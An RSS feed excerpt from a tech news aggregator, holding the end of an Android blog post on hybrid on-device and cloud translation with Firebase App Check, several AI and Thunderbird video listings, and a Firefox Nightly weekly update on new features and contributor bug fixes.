  <li><strong>Cloud translation (Gemini 3 Flash):</strong> For more complex languages, we use Gemini Flash 3 to get a higher quality translation.</li>
</ul>

<pre><code>// implementation("com.google.android.gms:play-services-mlkit-language-id:17.0.0") 

// ML Kit for Language Identification (powered by Google Play Services)
private val languageIdentifier = LanguageIdentification.getClient()

// On-device translator model (prefer Gemini Nano) for translating common language pairs
private val hybridTranslationModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        modelName = "gemini-3-flash",
        onDeviceConfig = OnDeviceConfig(mode = InferenceMode.PREFER_ON_DEVICE)
    )

// Cloud translator model for more complex language pairs
private val cloudTranslationModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        modelName = "gemini-3-flash"
    )</code></pre>

<p>When a message needs to be translated, we identify the source language and apply our custom routing logic, executing either on-device or cloud translation:</p>

<pre><code>fun translateMessage(message: SupportChatMessage) {
    viewModelScope.launch {
        // 1. Detect language using ML Kit Language Identification
        val sourceLang = try {
            Tasks.await(languageIdentifier.identifyLanguage(message.text))
        } catch (e: Exception) {
            "Undefined"
        }

        // 2. Custom routing: we've verified the translation quality for English and Korean with Gemini Nano, and will translate message on-device for those two languages
        val routeToCloud = sourceLang != "en" &amp;&amp; sourceLang != "kr"

        val prompt = "Translate the following text to $selectedLanguage. Just return the translated sentence: ${message.text}."

        val (translatedText, routePrefix) = if (routeToCloud) {
            val result = cloudTranslationModel.generateContent(prompt)
            result.text to "[Cloud]"
        } else {
            val result = hybridTranslationModel.generateContent(prompt)
            result.text to "[On-Device]"
        }

        if (translatedText != null) {
            _translations.update { current -&gt;
                current + (message.id to "$routePrefix: $translatedText")
            }
        }
    }
}</code></pre>

<p>In this example, the custom routing logic only takes into consideration the translation’s source and target language. However, based on your app’s use case, you can expand the routing logic to include other factors such as the on-device model version, network connectivity, battery status, and more.</p>

<h2>Securing the AI Pipelines: Firebase App Check</h2>
<p>Lastly, using AI in the cloud opens up possibilities of API key abuse or unauthorized billing. To secure API calls, we integrated <a href="https://firebase.google.com/docs/app-check"><b>Firebase App Check</b></a> using both Play Integrity (production) and the local Debug Provider (for local development or emulators).</p>

<p>In the <a href="https://github.com/android/ai-samples/blob/main/jetpacker/android/app/src/main/kotlin/com/example/jetpacker/JetPackerApplication.kt">JetPackerApplication.kt</a> file, we install the debug provider at startup and trigger anonymous authentication to establish a secure user session:</p>

<pre><code>//  implementation("com.google.firebase:firebase-appcheck-playintegrity") 
//  implementation("com.google.firebase:firebase-appcheck-debug")  
//  implementation("com.google.firebase:firebase-auth") 

override fun onCreate() {
    super.onCreate()
    Firebase.initialize(context = this)
    Firebase.appCheck.installAppCheckProviderFactory(
        DebugAppCheckProviderFactory.getInstance()
    )
    Firebase.auth.signInAnonymously()
}</code></pre>

<p>When building locally on an emulator, App Check prints a local token secret to logcat:</p>

<p>Enter this debug secret into the allow list in the Firebase Console: a8c2dd4c-xxxx-xxxx-xxxx-ef6c114ba27e</p>

<p>Once registered in the Firebase console, local requests are fully verified and authenticated by App Check, protecting our backend while letting us test the app locally.</p>

<h2>Conclusion</h2>
<p>By combining cloud model capabilities (grounding, system instructions) with on-device capabilities (hybrid routing, translation, security app checks), we created a travel app that is smart, secure, and available offline.</p>

<p>Check out the <a href="https://github.com/android/ai-samples/tree/main/jetpacker" target="_blank">full source code for Jetpacker on GitHub</a>, and explore the Firebase documentation to get started:</p>
<p><a href="https://firebase.google.com/docs/ai-logic/get-started">Firebase AI Logic Documentation</a><br><a href="https://firebase.google.com/docs/ai-logic/hybrid/android/get-started">Firebase Hybrid Inference API</a></p>

<h2>Learn more</h2>
<p>Check out the other parts of this blog post series:</p>
<p><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html">Part 1</a>:</b> Introduction of the app and a high-level overview.<br><b><a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html">Part 2</a>: </b>On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html">Part 3 (this post!):</a></b> Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.<br><b><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html">Part 4:</a> </b>System integration. Integrating with the Android intelligence system using AppFunctions. <br><b>Part 5 (coming soon):</b> In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.</p>

<p>Interested in more on Android Development? Follow Android Developers on <a href="https://www.youtube.com/@AndroidDevelopers">YouTube</a> or <a href="https://www.linkedin.com/showcase/androiddev/">LinkedIn</a>!</p>

<p>All code snippets in this blog post follow the following copyright notice:</p>
<pre><code>Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0</code></pre>]]></content:encoded>
</item>
<item>
<title><![CDATA[Community Office Hours: Exchange Email Support]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 15x - Views:697 Welcome to the last Community Office Hours of 2025! In this edition, Heather and Monica welcome Sr. Software Engineer Brendan Abolivier and Software Engineer Eleanor Dichary from the Desktop Team. We’re discussing the recent Exchange Web Su...]]></description>
<link>https://tsecurity.de/de/3693439/video/community-office-hours-exchange-email-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693439/video/community-office-hours-exchange-email-support/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:14 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 15x - Views:697 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/w986NrVHBM0?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Welcome to the last Community Office Hours of 2025! In this edition, Heather and Monica welcome Sr. Software Engineer Brendan Abolivier and Software Engineer Eleanor Dichary from the Desktop Team. We’re discussing the recent Exchange Web Support for email that just landed in Thunderbird Monthly Release 145. Learn how the team landed this feature and discover future plans for Calendar and Contact support, as well as Graph API<br />
<br />
Chapters:<br />
00:00 Intro<br />
03:50 What is Microsoft Exchange<br />
05:07 Why it took so long to add Exchange<br />
14:33 Exchange in Thunderbird 145<br />
18:20 Config options and authorization<br />
27:10 Attachments and storage<br />
32:30 Sync and folder operations<br />
36:10 Filters and notification<br />
39:10 Search<br />
40:20 Feedback and bug reporting<br />
43:00 Mobile and Graph API<br />
49:09 JMAP and future protocols<br />
55:50 Calendar and address book<br />
59:57 Roadmap and EWS deprecation<br />
62:23 Closing<br />
<br />
Resources:<br />
Exchange Mozilla Support Article: https://support.mozilla.org/en-US/kb/thunderbird-and-exchange<br />
Exchange Mozilla Wiki Post (with call for testing): https://wiki.mozilla.org/Thunderbird%3AExchange<br />
Reach out on Matrix: https://matrix.to/#/#thunderbird:mozilla.org<br />
Bugzilla (use Exchange component for reporting): https://bugzilla.mozilla.org/enter_bug.cgi?product=MailNews%20Core<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 Secret Bard Tips And Tricks (How To Use Google Bard)(Google Bard Tutorial)]]></title>
<description><![CDATA[Author: TheAIGRID - Bewertung: 486x - Views:35021 How To Use Google Bard)(Google Bard Tutorial)

Welcome to our channel where we bring you the latest breakthroughs in AI. From deep learning to robotics, we cover it all. Our videos offer valuable insights and perspectives that will expand your kno...]]></description>
<link>https://tsecurity.de/de/3693376/videos/10-secret-bard-tips-and-tricks-how-to-use-google-bardgoogle-bard-tutorial/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693376/videos/10-secret-bard-tips-and-tricks-how-to-use-google-bardgoogle-bard-tutorial/</guid>
<pubDate>Sat, 25 Jul 2026 09:05:25 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: TheAIGRID - Bewertung: 486x - Views:35021 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/HwUt9ZRziBE?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>How To Use Google Bard)(Google Bard Tutorial)<br />
<br />
Welcome to our channel where we bring you the latest breakthroughs in AI. From deep learning to robotics, we cover it all. Our videos offer valuable insights and perspectives that will expand your knowledge and understanding of this rapidly evolving field. Be sure to subscribe and stay updated on our latest videos.<br />
<br />
All Bard Features <br />
- Bard Can Make Charts - https://www.reddit.com/r/GoogleBard/comments/123s0yt/wow_google_bard_can_make_a_chart_bing_ai_used_to/<br />
- Bard makes very big mistakes https://twitter.com/0xgaut/status/1638287359098716160 <br />
- Bard Cannot Help With Coding - https://twitter.com/iamnafets/status/1638232186649477120/photo/1 <br />
- Bard Actually has access to recent events <br />
- Bard Cant Access Articles (Sometimes<br />
- Bard Can Rewrite content<br />
- Rewording Questions Helps https://www.reddit.com/r/GoogleBard/comments/11xoaw7/bard_can_actually_answer_code_questions_it_just/<br />
- Bard Can write stories<br />
- Bard is a confusing mix between ChatGPT + Bing<br />
- Bard does have shorter answers<br />
- Bard is quicker<br />
<br />
Was there anything we missed?<br />
<br />
(For Business Enquiries)  contact@theaigrid.com<br />
<br />
#LLM #Largelanguagemodel #chatgpt<br />
#AI<br />
#ArtificialIntelligence<br />
#MachineLearning<br />
#DeepLearning<br />
#NeuralNetworks<br />
#Robotics<br />
#DataScience<br />
#IntelligentSystems<br />
#Automation<br />
#TechInnovation<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft's VISUALChatGPT Takes the Industry By STORM! (NOW UNVEILED!)]]></title>
<description><![CDATA[Author: TheAIGRID - Bewertung: 2436x - Views:330281 Microsoft Visual ChatGPT - https://github.com/microsoft/visual-chatgpt
Microsoft Visual ChatGPT - https://huggingface.co/spaces/microsoft/visual_chatgpt

Welcome to our channel where we bring you the latest breakthroughs in AI. From deep learnin...]]></description>
<link>https://tsecurity.de/de/3693374/videos/microsofts-visualchatgpt-takes-the-industry-by-storm-now-unveiled/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693374/videos/microsofts-visualchatgpt-takes-the-industry-by-storm-now-unveiled/</guid>
<pubDate>Sat, 25 Jul 2026 09:05:22 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: TheAIGRID - Bewertung: 2436x - Views:330281 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/7hztoCMVo0U?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Microsoft Visual ChatGPT - https://github.com/microsoft/visual-chatgpt<br />
Microsoft Visual ChatGPT - https://huggingface.co/spaces/microsoft/visual_chatgpt<br />
<br />
Welcome to our channel where we bring you the latest breakthroughs in AI. From deep learning to robotics, we cover it all. Our videos offer valuable insights and perspectives that will expand your knowledge and understanding of this rapidly evolving field. Be sure to subscribe and stay updated on our latest videos.<br />
<br />
Was there anything we missed?<br />
<br />
(For Business Enquiries)  contact@theaigrid.com<br />
<br />
#LLM #Largelanguagemodel #chatgpt<br />
#AI<br />
#ArtificialIntelligence<br />
#MachineLearning<br />
#DeepLearning<br />
#NeuralNetworks<br />
#Robotics<br />
#DataScience<br />
#IntelligentSystems<br />
#Automation<br />
#TechInnovation<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Get Ready for 15 SHOCKING Changes After the Singularity (AGI IS NEAR!)]]></title>
<description><![CDATA[Author: TheAIGRID - Bewertung: 2476x - Views:151461 15 Jaw-Dropping Consequences of the Singularity (AGI IS CLOSER THAN YOU THINK!)

Welcome to our channel where we bring you the latest breakthroughs in AI. From deep learning to robotics, we cover it all. Our videos offer valuable insights and pe...]]></description>
<link>https://tsecurity.de/de/3693373/videos/get-ready-for-15-shocking-changes-after-the-singularity-agi-is-near/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693373/videos/get-ready-for-15-shocking-changes-after-the-singularity-agi-is-near/</guid>
<pubDate>Sat, 25 Jul 2026 09:05:21 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: TheAIGRID - Bewertung: 2476x - Views:151461 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/F95s2bLMNIY?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>15 Jaw-Dropping Consequences of the Singularity (AGI IS CLOSER THAN YOU THINK!)<br />
<br />
Welcome to our channel where we bring you the latest breakthroughs in AI. From deep learning to robotics, we cover it all. Our videos offer valuable insights and perspectives that will expand your knowledge and understanding of this rapidly evolving field. Be sure to subscribe and stay updated on our latest videos.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Nightly: Backup for a Rainy Day – These Weeks in Firefox: Issue 202]]></title>
<description><![CDATA[Highlights

The profile backup mechanism has been enabled by default for all desktop platforms in Nightly, as well as Beta! The current plan is to have this ride out to Firefox 151 for Windows, macOS and Linux on May 18th!

This feature, when enabled, will create a copy of your profile data in th...]]></description>
<link>https://tsecurity.de/de/3693295/tools/firefox-nightly-backup-for-a-rainy-day-these-weeks-in-firefox-issue-202/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693295/tools/firefox-nightly-backup-for-a-rainy-day-these-weeks-in-firefox-issue-202/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:35 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Highlights</h3>
<ul>
<li>The profile backup mechanism has been enabled by default for all desktop platforms in Nightly, as well as Beta! The current plan is to have this ride out to Firefox 151 for Windows, macOS and Linux on May 18th!
<ul>
<li>This feature, when enabled, will create a copy of your profile data in the background and store it in a single file on your file system that you can restore from.</li>
<li>You will be able to manage this feature in Settings under Sync (for now)
<ul>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image6.png"><img alt="Firefox settings page showing the Backup feature in dark mode. Backup is enabled, with details of the most recent backup and a “Backup now” button. The page displays the backup file name and a backup location folder path, along with “Choose…” and “Show in folder” buttons. A “Sensitive data” section includes an option to back up passwords and payment methods with encryption, and a disabled “Change password” button." class="aligncenter size-full wp-image-2074" height="517" src="https://blog.nightly.mozilla.org/files/2026/06/image6.png" width="657"></a></li>
</ul>
</li>
<li><a href="https://support.mozilla.org/kb/firefox-backup">You can read more about the feature here</a></li>
</ul>
</li>
<li>As followups to the recent addition to the WebExtension tabs API to <a href="https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Working_with_the_Tabs_API#working_with_tab_split_views">support the new SplitView tabs feature</a>, tabs.group() and tabs.ungroup() have been fixed to work correctly with split view tabs, and fixed split views being prepended instead of appended to tab groups when adopted into a new window –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029099"> Bug 2029099</a> /<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029534"> Bug 2029534</a></li>
<li>Adaptive autofill has been enabled on Nightly.
<ul>
<li>Previously, autofill only completed domains (e.g. typing red autofilled<a href="http://reddit.com/"> reddit.com</a>). Now it can also complete full URLs for pages you visit often (e.g. red →<a href="http://reddit.com/r/firefox"> reddit.com/r/firefox</a>), learning from what you actually click in the address bar. If a suggestion isn’t helpful, you can now dismiss it so autofill learns what not to show you too.
<ul>
<li>If you run into issues or have feedback, <a href="https://bugzilla.mozilla.org/enter_bug.cgi?product=Firefox&amp;component=Address+Bar">you can file a bug here</a>!</li>
</ul>
</li>
</ul>
</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=293943">Markus Stange [:mstange]</a> implemented dynamic toolbar on top in RDM (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1978145">#1978145</a>), but also implemented some static skeleton UI so it’s closer to what we actually have in Firefox for Android
<ul>
<li>dynamic toolbar is behind a pref: devtools.responsive.dynamicToolbar.enabled</li>
<li>it can be put on top by setting devtools.responsive.dynamicToolbar.onTop, otherwise it’s at the bottom</li>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image1.png"><img alt="Firefox Responsive Design Mode on Desktop displaying the Mozilla homepage in a mobile viewport. The toolbar at the top shows a simulated Android device (including the dynamic toolbar) with a viewport size of 376 × 464 pixels and a device pixel ratio of 3. The page content is shown in French, featuring the Mozilla logo, a “Menu” link, a “Pause animation” button, and the headline “Bienvenue chez Mozilla” with accompanying text about trusted technology and digital rights." class="aligncenter size-full wp-image-2069" height="1113" src="https://blog.nightly.mozilla.org/files/2026/06/image1.png" width="882"></a></li>
</ul>
</li>
</ul>
<h3>Friends of the Firefox team</h3>
<h3><a href="https://bugzilla.mozilla.org/buglist.cgi?title=Resolved%20bugs%20(excluding%20employees)&amp;quicksearch=958957%2C1876109%2C1997388%2C2000797%2C1950995%2C1986020%2C2018272%2C2018276%2C2021681%2C2027969%2C2022115%2C1999012%2C2016058%2C2026585%2C2023913%2C2028167%2C2028293%2C2028927%2C1998002%2C2011343%2C1997925%2C2026574%2C2029398%2C2029684%2C1948019%2C2008756%2C2022601%2C2026032%2C2030428%2C1968244%2C1975391%2C944228%2C1962904%2C1977741%2C1997346%2C2027867%2C2030631%2C1807516%2C2030998%2C2030999%2C2015491%2C2028153%2C2028628%2C1978290%2C2008128%2C2024033%2C1883497%2C1984679%2C2030069%2C2031162%2C2031598%2C2012399%2C2031116%2C2031128%2C2031931%2C2031961%2C2033173%2C2032997%2C1919387%2C1947679%2C2027915%2C2032196%2C2019561%2C2024187%2C1392125%2C1993844%2C2027060%2C1983408%2C2034178%2C1873954%2C1875083%2C2008119%2C2008197%2C1628669%2C2031599%2C2033820">Resolved bugs (excluding employees)</a></h3>
<p><a href="https://github.com/niklasbaumgardner/NewContributorScraper">Script to find new contributors from bug list</a></p>
<h4>Volunteers that fixed more than one bug</h4>
<ul>
<li>Amin Amir</li>
<li>aoia7rz7l</li>
<li>Chukwuka Rosemary</li>
<li>DrSeed</li>
<li>Frédéric Wang Nélar</li>
<li>japandi</li>
<li>John Iweh</li>
<li>jonathancabera</li>
<li>Josh Aas</li>
<li>Keji Bakare</li>
<li>kofoworola shonuyi</li>
<li>konyhéa</li>
<li>liz</li>
<li>Mathew Hodson</li>
<li>Okhuomon Ajayi</li>
<li>Oluwatobi</li>
<li>ROSHAAN</li>
<li>Sam Johnson</li>
</ul>
<h4>New contributors (🌟 = first patch)</h4>
<ul>
<li> Anthony Mclamb:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027915"> Disable the legacy Edge migrator</a></li>
<li> Amin Amir
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031599">Fix browsingContext.sys.mjs to assign to #contextCreatedHandled instead of contextCreatedHandled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033820">Fix missing WITHOUT ROWID SQLite performance optimization in SERPCategorization.sys.mjs</a></li>
<li>🌟 Amine Zroual:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1392125"> Omitted maxResults property not handled correctly in getRecentlyClosed</a></li>
</ul>
</li>
<li>any1here:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031162"> install_sig_alt_stack incorrectly checks mmap’s return value</a></li>
<li>🌟 Armin Ulrich:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031598"> Fix MessageHandlerRegistry.sys.mjs calling getExistingMessageHandler with an unused second argument</a></li>
<li>japandi
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1628669">Cannot remove amazon.com from top sites list</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1977741">The height of the pinned tabs area should be responsive to the number of pins</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1986020">Use cenum for nsIHelperAppLauncherDialog reason constants to enable better typescript annotations</a></li>
</ul>
</li>
<li>Nathan Johnson [:narjoDev]:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1950995"> Remove browser.display.use_system_colors pref</a></li>
<li>DrSeed
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1962904">Firefox shows vertical tabs in new windows despite “Hide tabs and sidebar” setting</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1968244">The “Expand sidebar on hover” option is not kept after the vertical tabs are disabled and enabled again</a></li>
</ul>
</li>
<li>Keji Bakare:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008756">Split view’s focus-outline is clipped on the right side of left tab</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031116">White space on the right side of left panel in split view</a></li>
</ul>
</li>
<li>🌟 gotyaoi:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1807516"> Reload toolbar button is active on about:newtab</a></li>
<li>Itoro James:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015491"> [A11y][Keyboard Navigation]Cancelling a note via Keyboard Navigation still saves it</a></li>
<li>John Iweh:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1997925"> The notification dot is not displayed if the tab is in a Split View</a></li>
<li>🌟 John Iweh:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027867"> sidebar-shown attribute remains when sidebar.revamp is false</a></li>
<li>🌟 jonathancabera:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2012399">The Move tab to Split View option is also displayed for the tabs that are within the Split View</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2016058">A Note with long text (1003 characters) is saved by pressing ENTER even if the “Save” button is disabled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026032">Tab group guide line becomes disconnected under certain conditions related to split views in vertical tab mode</a></li>
</ul>
</li>
<li>Aloys:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2000797"> Remove logic that forces distribution language packs to be reinstalled when upgrading from Firefoxes older than 67</a></li>
<li>liz:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1875083">Create test to ensure maxRenderCountEstimate is never being set to Infinity in virtual-list component in Fx View</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008119">Button accessible name does not convey its function: missing topic context (Settings dialog &gt; Topics dialog &gt; buttons Following/Unfollow/Blocked/Unblock)</a></li>
</ul>
</li>
<li>Mary cathline:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022115"> Tab Group Label does not respect touch density in vertical tab bar</a></li>
<li>🌟 Brandon Lucier:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030631"> Popups opened with window.open give window type normal instead of popup</a></li>
<li>karan68:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1997388"> [dialog] New Shortcut dialog needs a label/accessible name</a></li>
<li>🌟 Vector:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008128"> Button does not programmatically indicate that it opens a dialog (Recent activity section &gt; story card &gt; ••• disclosure &gt; Delete from History button)</a></li>
<li>🌟 Osoble:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1876109"> Update font size and weight for synced tabs device name headers in Firefox View</a></li>
<li>konyhéa:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1873954">Add test for sync admin disabled to browser_syncedtabs_errors_firefoxview.js</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1883497">Check all second paramaters for TestUtils.waitForCondition in Fx View test files</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030069">Recently Closed Tabs, Tabs from Other Devices, and History pages should have Cmd / Ctrl + Click on a link open the link in the new background tab.</a></li>
</ul>
</li>
<li>Noble Chinonso: <a href="http://sidebartreeview.js/">#shouldHandleEvent in SidebarTreeView.js compares event.keyCode to string values, causing Home/End keys to never be handled</a></li>
<li>Pranjali Srivastava:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=944228"> Add a test to verify that the space above tabs is consistent across PB, LWT and sizemode (where appropriate)</a></li>
<li>Okhuomon Ajayi:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2018272">More spacing is needed between the tab note icon and the close icon on the tab</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2019561">The tabs in vertical mode collapsed state are positioned differently in Split View</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027060">Keep vertical split view tabs stacked vertically even when the sidebar is expanded when expand on hover is enabled</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029684">Vertical split view tabs can be too big or small when tabs are overflowing</a></li>
</ul>
</li>
<li>🌟 Rishan:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2030428"> Fix duplicated arrow function in browser_history_sidebar.js</a></li>
<li>Chukwuka Rosemary:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1948019">“Forget About This Site” context menu option missing from Firefox View history</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026574">Long strings are not displayed properly on the about:opentabs page search filed</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028153">Add test for Forget This Site option in Fxview history context menu.</a></li>
</ul>
</li>
<li>ROSHAAN:
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2018276">Tab note background colour is incorrect for default light theme</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1997346"> [win/linux] The splitter between content areas does not match Figma spec</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028927">Fix typo in OpenInTabsUtils.confirmOpenInTabs()</a></li>
</ul>
</li>
<li>Sameeksha:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2008197"> Disclosure button expanded/collapsed state not programmatically defined (Customize button)</a></li>
<li>kofoworola shonuyi:
<ul>
<li>🌟<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1999012">Actually hide or remove sidebar-shown attribute when in fullscreen.</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028293">Add a test for checking sidebar-shown attribute in fullscreen mode</a></li>
</ul>
</li>
<li>🌟 Sayd Mateen:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021681"> Page URL is displayed as tab name when page’s contains about:reader?&lt;/a&gt;&lt;/p&gt; &lt;p&gt;</a></li>
</ul>
<ul>
<li>Oluwatobi:
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1975391">Unable to delete selected history entries from sidebar</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1993844">Incorrect Sidebar button state/tooltip hover text</a></li>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2023913">The city name heading level doesn’t follow the correct heading level order</a></li>
</ul>
</li>
<li>Nishchay [:nish]:<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031961"> Unable to add tabs to old closed tab groups (tabGroupState.splitViews is undefined)</a></li>
</ul>
<p> </p>
<h3>Project Updates</h3>
<h4>Add-ons / Web Extensions</h4>
<h5>Addon Manager &amp; about:addons</h5>
<ul>
<li>In preparation for the Project Nova restyling of the about:addons page, we have refactored about:addons into separate per-component ES modules, splitting the monolithic aboutaddons.js and aboutaddons.html into 16 dedicated component files under components/ (with no behavior or UI changes) –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032014"> Bug 2032014</a>
<ul>
<li>NOTE: if you have working on patches with changes to about:addons internals it is very likely you’ll need to rebase and solve merge conflicts hit on top of this refactoring, the internals are still largely the same as before but don’t hesitate to reach out to the Addons team if you have doubts / questions or need help to figure out how to adapt your patch of top of these changes</li>
</ul>
</li>
</ul>
<h5>WebExtensions Framework</h5>
<ul>
<li>Fixed exportFunction to preserve the constructibility of the wrapped function instead of unconditionally making all exported functions implicitly as constructors –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033173"> Bug 2033173</a>
<ul>
<li>Thanks to Gregory Pappas for contributing this improvement to the Content Scripts’ Xray Wrappers helpers!</li>
</ul>
</li>
<li>Fixed a Firefox 151 regression where extension content scripts accessing location.ancestorOrigins caused subsequent page script reads of the same property to fail with “Permission denied”, breaking sites like Gmail –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034329"> Bug 2034329</a>
<ul>
<li>Thanks to Simon Farre for promptly investigating and fixing this recent regression!</li>
</ul>
</li>
</ul>
<h5>WebExtension APIs</h5>
<ul>
<li>Updated sessions.getRecentlyClosed() to remove the hardcoded cap when maxResults is omitted –<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1392125"> Bug 1392125</a>
<ul>
<li>Shoutout to Amine Zroual for contributing this enhancement to the sessions WebExtensions API!</li>
</ul>
</li>
</ul>
<h4>DevTools</h4>
<ul>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=750915">Artem Manushenkov</a> fixed an issue where autosuggestion popup was removing overridden indicators from properties in the Inspector (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1983408">#1983408</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=446257">Andrea Marchesini [:baku]</a> fix DevTools cookie header serialization for long cookies, which could lead to cookies not being visible in Netmonitor (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031299">#2031299</a>)</li>
<li><a href="https://bugzilla.mozilla.org/user_profile?user_id=559949">Julian Descottes [:jdescottes]</a> fixed a toolbox crash that was happening we couldn’t find a localization file (e.g. when using a language pack on Nightly) (<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028930">#2028930</a>)</li>
